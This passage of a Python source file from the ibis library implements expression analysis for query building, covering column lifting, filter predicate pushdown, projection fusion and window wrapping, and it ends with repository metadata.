helper = _Substitutor(expr, self.substitutions,
sub_memo=self.sub_memo)
return helper.get_result()
def substitute_parents(expr, lift_memo=None, past_projection=True):
rewriter = ExprSimplifier(expr, lift_memo=lift_memo,
block_projection=not past_projection)
return rewriter.get_result()
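# Illustrative sketch (hypothetical expressions): given a column reference
# built on top of a filter or projection that merely passes the column
# through, this "lifts" the reference so it points at the underlying table:
#
#     # substitute_parents(projected.some_col)  may become  base_table.some_col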
class ExprSimplifier(object):
"""
    Rewrite the input expression by replacing any table expressions that are
    part of a "commutative table operation unit" (for lack of a scientific
    term: a set of operations that can be written down in any order and still
    yield the same semantic result).
"""
def __init__(self, expr, lift_memo=None, block_projection=False):
self.expr = expr
self.lift_memo = lift_memo or {}
self.block_projection = block_projection
def get_result(self):
expr = self.expr
node = expr.op()
if isinstance(node, ir.Literal):
return expr
# For table column references, in the event that we're on top of a
# projection, we need to check whether the ref comes from the base
# table schema or is a derived field. If we've projected out of
# something other than a physical table, then lifting should not occur
if isinstance(node, ops.TableColumn):
result = self._lift_TableColumn(expr, block=self.block_projection)
if result is not expr:
return result
# Temporary hacks around issues addressed in #109
elif isinstance(node, ops.Projection):
return self._lift_Projection(expr, block=self.block_projection)
elif isinstance(node, ops.Aggregation):
return self._lift_Aggregation(expr, block=self.block_projection)
unchanged = True
lifted_args = []
for arg in node.args:
lifted_arg, unch_arg = self._lift_arg(arg)
lifted_args.append(lifted_arg)
unchanged = unchanged and unch_arg
# Do not modify unnecessarily
if unchanged:
return expr
lifted_node = type(node)(*lifted_args)
if isinstance(expr, ir.ValueExpr):
result = expr._factory(lifted_node, name=expr._name)
else:
result = expr._factory(lifted_node)
return result
def _lift_arg(self, arg, block=None):
unchanged = [True]
def _lift(x):
if isinstance(x, ir.Expr):
lifted_arg = self.lift(x, block=block)
if lifted_arg is not x:
unchanged[0] = False
else:
# a string or some other thing
lifted_arg = x
return lifted_arg
if arg is None:
return arg, True
if isinstance(arg, (tuple, list)):
result = [_lift(x) for x in arg]
else:
result = _lift(arg)
return result, unchanged[0]
def lift(self, expr, block=None):
# This use of id() is OK since only for memoization
key = id(expr.op()), block
if key in self.lift_memo:
return self.lift_memo[key]
op = expr.op()
if isinstance(op, (ops.ValueNode, ops.ArrayNode)):
return self._sub(expr, block=block)
elif isinstance(op, ops.Filter):
result = self.lift(op.table, block=block)
elif isinstance(op, ops.Projection):
result = self._lift_Projection(expr, block=block)
elif isinstance(op, ops.Join):
result = self._lift_Join(expr, block=block)
elif isinstance(op, (ops.TableNode, ir.HasSchema)):
return expr
else:
raise NotImplementedError
# If we get here, time to record the modified expression in our memo to
# avoid excessive graph-walking
self.lift_memo[key] = result
return result
def _lift_TableColumn(self, expr, block=None):
node = expr.op()
tnode = node.table.op()
root = _base_table(tnode)
result = expr
if isinstance(root, ops.Projection):
can_lift = False
for val in root.selections:
if (isinstance(val.op(), ops.PhysicalTable) and
node.name in val.schema()):
can_lift = True
lifted_root = self.lift(val)
elif (isinstance(val.op(), ops.TableColumn) and
val.op().name == val.get_name() and
node.name == val.get_name()):
can_lift = True
lifted_root = self.lift(val.op().table)
# XXX
# can_lift = False
# HACK: If we've projected a join, do not lift the children
# TODO: what about limits and other things?
# if isinstance(root.table.op(), Join):
# can_lift = False
if can_lift and not block:
lifted_node = ops.TableColumn(node.name, lifted_root)
result = expr._factory(lifted_node, name=expr._name)
return result
def _lift_Aggregation(self, expr, block=None):
if block is None:
block = self.block_projection
op = expr.op()
lifted_table = self.lift(op.table, block=True)
unch = lifted_table is op.table
lifted_aggs, unch1 = self._lift_arg(op.agg_exprs, block=True)
lifted_by, unch2 = self._lift_arg(op.by, block=True)
lifted_having, unch3 = self._lift_arg(op.having, block=True)
unchanged = unch and unch1 and unch2 and unch3
if not unchanged:
lifted_op = ops.Aggregation(lifted_table, lifted_aggs,
by=lifted_by, having=lifted_having)
result = ir.TableExpr(lifted_op)
else:
result = expr
return result
def _lift_Projection(self, expr, block=None):
if block is None:
block = self.block_projection
op = expr.op()
if block:
lifted_table = op.table
unch = True
else:
lifted_table, unch = self._lift_arg(op.table, block=True)
lifted_selections, unch_sel = self._lift_arg(op.selections, block=True)
unchanged = unch and unch_sel
if not unchanged:
lifted_projection = ops.Projection(lifted_table, lifted_selections)
result = ir.TableExpr(lifted_projection)
else:
result = expr
return result
def _lift_Join(self, expr, block=None):
op = expr.op()
left_lifted = self.lift(op.left, block=block)
right_lifted = self.lift(op.right, block=block)
unchanged = (left_lifted is op.left and
right_lifted is op.right)
# Fix predicates
lifted_preds = []
for x in op.predicates:
subbed = self._sub(x, block=True)
if subbed is not x:
unchanged = False
lifted_preds.append(subbed)
if not unchanged:
lifted_join = type(op)(left_lifted, right_lifted, lifted_preds)
result = ir.TableExpr(lifted_join)
else:
result = expr
return result
def _sub(self, expr, block=None):
# catchall recursive rewriter
if block is None:
block = self.block_projection
helper = ExprSimplifier(expr, lift_memo=self.lift_memo,
block_projection=block)
return helper.get_result()
def _base_table(table_node):
# Find the aggregate or projection root. Not proud of this
if isinstance(table_node, ir.BlockingTableNode):
return table_node
else:
return _base_table(table_node.table.op())
def apply_filter(expr, predicates):
# This will attempt predicate pushdown in the cases where we can do it
# easily and safely
op = expr.op()
if isinstance(op, ops.Filter):
# Potential fusion opportunity. The predicates may need to be rewritten
# in terms of the child table. This prevents the broken ref issue
# (described in more detail in #59)
predicates = [sub_for(x, [(expr, op.table)]) for x in predicates]
return ops.Filter(op.table, op.predicates + predicates)
elif isinstance(op, (ops.Projection, ops.Aggregation)):
# if any of the filter predicates have the parent expression among
# their roots, then pushdown (at least of that predicate) is not
# possible
# It's not unusual for the filter to reference the projection
# itself. If a predicate can be pushed down, in this case we must
# rewrite replacing the table refs with the roots internal to the
# projection we are referencing
#
        # If the filter references any new or derived aliases in the
        # projection, pushdown of that predicate is not possible.
        #
# in pseudocode
# c = Projection(Join(a, b, jpreds), ppreds)
# filter_pred = c.field1 == c.field2
# Filter(c, [filter_pred])
#
# Assuming that the fields referenced by the filter predicate originate
# below the projection, we need to rewrite the predicate referencing
# the parent tables in the join being projected
# TODO: is partial pushdown (one or more, but not all of the passed
# predicates) something we should consider doing? Could be reasonable
# if isinstance(op, ops.Projection):
# else:
# # Aggregation
# can_pushdown = op.table.is_an
can_pushdown = _can_pushdown(op, predicates)
if can_pushdown:
predicates = [substitute_parents(x) for x in predicates]
# this will further fuse, if possible
filtered = op.table.filter(predicates)
result = op.substitute_table(filtered)
else:
result = ops.Filter(expr, predicates)
else:
result = ops.Filter(expr, predicates)
return result
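# Illustrative sketch of the fusion behaviour above (hypothetical table `t`):
# filtering an already-filtered table produces a single Filter node with the
# concatenated predicate list, and a filter over a projection is pushed
# beneath the projection when _can_pushdown permits.
#
#     # t.filter([t.a > 0]).filter([t.b < 10])  ~  Filter(t, [t.a > 0, t.b < 10])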
def _can_pushdown(op, predicates):
# Per issues discussed in #173
#
# The only case in which pushdown is possible is that all table columns
# referenced must meet all of the following (not that onerous in practice)
# criteria
#
# 1) Is a table column, not any other kind of expression
# 2) Is unaliased. So, if you project t3.foo AS bar, then filter on bar,
# this cannot be pushed down (until we implement alias rewriting if
# necessary)
# 3) Appears in the selections in the projection (either is part of one of
# the entire tables or a single column selection)
can_pushdown = True
for pred in predicates:
validator = _PushdownValidate(op, pred)
predicate_is_valid = validator.get_result()
can_pushdown = can_pushdown and predicate_is_valid
return can_pushdown
class _PushdownValidate(object):
def __init__(self, parent, predicate):
self.parent = parent
self.pred = predicate
self.validator = ExprValidator([self.parent.table])
self.valid = True
def get_result(self):
self._walk(self.pred)
return self.valid
def _walk(self, expr):
node = expr.op()
if isinstance(node, ops.TableColumn):
is_valid = self._validate_column(expr)
self.valid = self.valid and is_valid
for arg in node.flat_args():
if isinstance(arg, ir.ValueExpr):
self._walk(arg)
# Skip other types of exprs
def _validate_column(self, expr):
if isinstance(self.parent, ops.Projection):
return self._validate_projection(expr)
else:
validator = ExprValidator([self.parent.table])
return validator.validate(expr)
def _validate_projection(self, expr):
is_valid = False
node = expr.op()
# Has a different alias, invalid
if _is_aliased(expr):
return False
for val in self.parent.selections:
if (isinstance(val.op(), ops.PhysicalTable) and
node.name in val.schema()):
is_valid = True
elif (isinstance(val.op(), ops.TableColumn) and
node.name == val.get_name() and
not _is_aliased(val)):
# Aliased table columns are no good
col_table = val.op().table.op()
lifted_node = substitute_parents(expr).op()
is_valid = (col_table.is_ancestor(node.table) or
col_table.is_ancestor(lifted_node.table))
# is_valid = True
return is_valid
def _is_aliased(col_expr):
return col_expr.op().name != col_expr.get_name()
def windowize_function(expr, w=None):
def _check_window(x):
# Hmm
arg, window = x.op().args
if isinstance(arg.op(), ops.RowNumber):
if len(window._order_by) == 0:
raise ExpressionError('RowNumber requires explicit '
'window sort')
return x
def _windowize(x, w):
if not isinstance(x.op(), ops.WindowOp):
walked = _walk(x, w)
else:
window_arg, window_w = x.op().args
walked_child = _walk(window_arg, w)
if walked_child is not window_arg:
walked = x._factory(ops.WindowOp(walked_child, window_w),
name=x._name)
else:
walked = x
op = walked.op()
if isinstance(op, (ops.AnalyticOp, ops.Reduction)):
if w is None:
w = window()
return _check_window(walked.over(w))
elif isinstance(op, ops.WindowOp):
if w is not None:
return _check_window(walked.over(w))
else:
return _check_window(walked)
else:
return walked
def _walk(x, w):
op = x.op()
unchanged = True
windowed_args = []
for arg in op.args:
if not isinstance(arg, ir.Expr):
windowed_args.append(arg)
continue
new_arg = _windowize(arg, w)
unchanged = unchanged and arg is new_arg
windowed_args.append(new_arg)
if not unchanged:
new_op = type(op)(*windowed_args)
return x._factory(new_op, name=x._name)
else:
return x
return _windowize(expr, w)
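# Illustrative sketch (hypothetical column t.amount, window w): bare
# reductions and analytic ops get wrapped in a default window(), while an
# explicit .over(w) is preserved apart from the RowNumber ordering check.
#
#     # windowize_function(t.amount.sum())          ~  t.amount.sum().over(window())
#     # windowize_function(t.amount.sum().over(w))  ~  unchanged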
class Projector(object):
"""
Analysis and validation of projection operation, taking advantage of
"projection fusion" opportunities where they exist, i.e. combining
compatible projections together rather than nesting them. Translation /
evaluation later will not attempt to do any further fusion /
simplification.
"""
def __init__(self, parent, proj_exprs):
self.parent = parent
node = self.parent.op()
if isinstance(node, ops.Projection):
roots = [node]
else:
roots = node.root_tables()
self.parent_roots = roots
clean_exprs = []
validator = ExprValidator([parent])
for expr in proj_exprs:
# Perform substitution only if we share common roots
if validator.shares_some_roots(expr):
expr = substitute_parents(expr, past_projection=False)
expr = windowize_function(expr)
clean_exprs.append(expr)
self.clean_exprs = clean_exprs
def get_result(self):
roots = self.parent_roots
if len(roots) == 1 and isinstance(roots[0], ops.Projection):
fused_op = self._check_fusion(roots[0])
if fused_op is not None:
return fused_op
return ops.Projection(self.parent, self.clean_exprs)
def _check_fusion(self, root):
roots = root.table._root_tables()
validator = ExprValidator([root.table])
fused_exprs = []
can_fuse = False
for val in self.clean_exprs:
# XXX
lifted_val = substitute_parents(val)
# a * projection
if (isinstance(val, ir.TableExpr) and
(self.parent.op().is_ancestor(val) or
# gross we share the same table root. Better way to
# detect?
len(roots) == 1 and val._root_tables()[0] is roots[0])):
can_fuse = True
fused_exprs.extend(root.selections)
elif validator.validate(lifted_val):
fused_exprs.append(lifted_val)
elif not validator.validate(val):
can_fuse = False
break
else:
fused_exprs.append(val)
if can_fuse:
return ops.Projection(root.table, fused_exprs)
else:
return None
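# Illustrative sketch of projection fusion (hypothetical base table `t` with
# columns a and b): projecting from a projection that only re-selects base
# columns collapses into a single node rather than nesting, roughly
#
#     # Projection(Projection(t, [t.a, t.b]), [t.a])  ->  Projection(t, [t.a])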
class ExprValidator(object):
def __init__(self, exprs):
self.parent_exprs = exprs
self.roots = []
for expr in self.parent_exprs:
self.roots.extend(expr._root_tables())
def has_common_roots(self, expr):
return self.validate(expr)
def validate(self, expr):
op = expr.op()
if isinstance(op, ops.TableColumn):
if self._among_roots(op.table.op()):
return True
elif isinstance(op, ops.Projection):
if self._among_roots(op):
return True
expr_roots = expr._root_tables()
for root in expr_roots:
if not self._among_roots(root):
return False
return True
def _among_roots(self, node):
for root in self.roots:
if root.is_ancestor(node):
return True
return False
def shares_some_roots(self, expr):
expr_roots = expr._root_tables()
return any(self._among_roots(root)
for root in expr_roots)
def validate_all(self, exprs):
for expr in exprs:
self.assert_valid(expr)
def assert_valid(self, expr):
if not self.validate(expr):
msg = self._error_message(expr)
raise RelationError(msg)
def _error_message(self, expr):
return ('The expression %s does not fully originate from '
'dependencies of the table expression.' % repr(expr))
class FilterValidator(ExprValidator):
"""
Filters need not necessarily originate fully from the ancestors of the
table being filtered. The key cases for this are
- Scalar reductions involving some other tables
- Array expressions involving other tables only (mapping to "uncorrelated
subqueries" in SQL-land)
- Reductions or array expressions like the above, but containing some
predicate with a record-specific interdependency ("correlated subqueries"
in SQL)
"""
def validate(self, expr):
op = expr.op()
is_valid = True
if isinstance(op, ops.Contains):
value_valid = ExprValidator.validate(self, op.value)
is_valid = value_valid
else:
roots_valid = []
for arg in op.flat_args():
if isinstance(arg, ir.ScalarExpr):
# arg_valid = True
pass
elif isinstance(arg, ir.ArrayExpr):
roots_valid.append(self.shares_some_roots(arg))
elif isinstance(arg, ir.Expr):
raise NotImplementedError
else:
# arg_valid = True
pass
is_valid = any(roots_valid)
return is_valid
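# Illustrative sketch (hypothetical tables t1 and t2, assuming the usual isin
# API): a filter predicate whose array arguments come entirely from another
# table still validates here, since it maps to an uncorrelated subquery:
#
#     # t1.filter([t1.key.isin(t2.key)])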
def find_base_table(expr):
if isinstance(expr, ir.TableExpr):
return expr
for arg in expr.op().flat_args():
if isinstance(arg, ir.Expr):
r = find_base_table(arg)
if isinstance(r, ir.TableExpr):
return r
def find_source_table(expr):
    # A more complex version of find_base_table.
# TODO: Revisit/refactor this all at some point
node = expr.op()
# First table expression observed for each argument that the expr
# depends on
first_tables = []
def push_first(arg):
if not isinstance(arg, ir.Expr):
return
if isinstance(arg, ir.TableExpr):
first_tables.append(arg)
else:
collect(arg.op())
def collect(node):
for arg in node.flat_args():
push_first(arg)
collect(node)
options = util.unique_by_key(first_tables, id)
if len(options) > 1:
raise NotImplementedError
return options[0]
def unwrap_ands(expr):
out_exprs = []
def walk(expr):
op = expr.op()
if isinstance(op, ops.Comparison):
out_exprs.append(expr)
elif isinstance(op, ops.And):
walk(op.left)
walk(op.right)
else:
raise Exception('Invalid predicate: {0!s}'
.format(expr._repr()))
walk(expr)
return out_exprs
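# Illustrative sketch (hypothetical columns): a conjunction of comparisons is
# flattened into its component predicates; any node other than And or a
# Comparison raises.
#
#     # unwrap_ands((t.a > 1) & (t.b < 2))  ->  [t.a > 1, t.b < 2]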
def find_backend(expr):
from ibis.client import Client
backends = []
def walk(expr):
node = expr.op()
for arg in node.flat_args():
if isinstance(arg, Client):
backends.append(arg)
elif isinstance(arg, ir.Expr):
walk(arg)
walk(expr)
backends = util.unique_by_key(backends, id)
if len(backends) > 1:
raise ValueError('Multiple backends found')
return backends[0]
| {
"content_hash": "f76ef3d9442f123bb3e364ae296ed8a0",
"timestamp": "",
"source": "github",
"line_count": 781,
"max_line_length": 79,
"avg_line_length": 30.52368758002561,
"alnum_prop": 0.5653341163639415,
"repo_name": "shaunstanislaus/ibis",
"id": "d7471e2dfd17fd4baf948af0087d84a635dfd3cb",
"size": "24413",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "ibis/expr/analysis.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "3684"
},
{
"name": "Makefile",
"bytes": "42"
},
{
"name": "Python",
"bytes": "766938"
},
{
"name": "Shell",
"bytes": "2116"
}
],
"symlink_target": ""
} |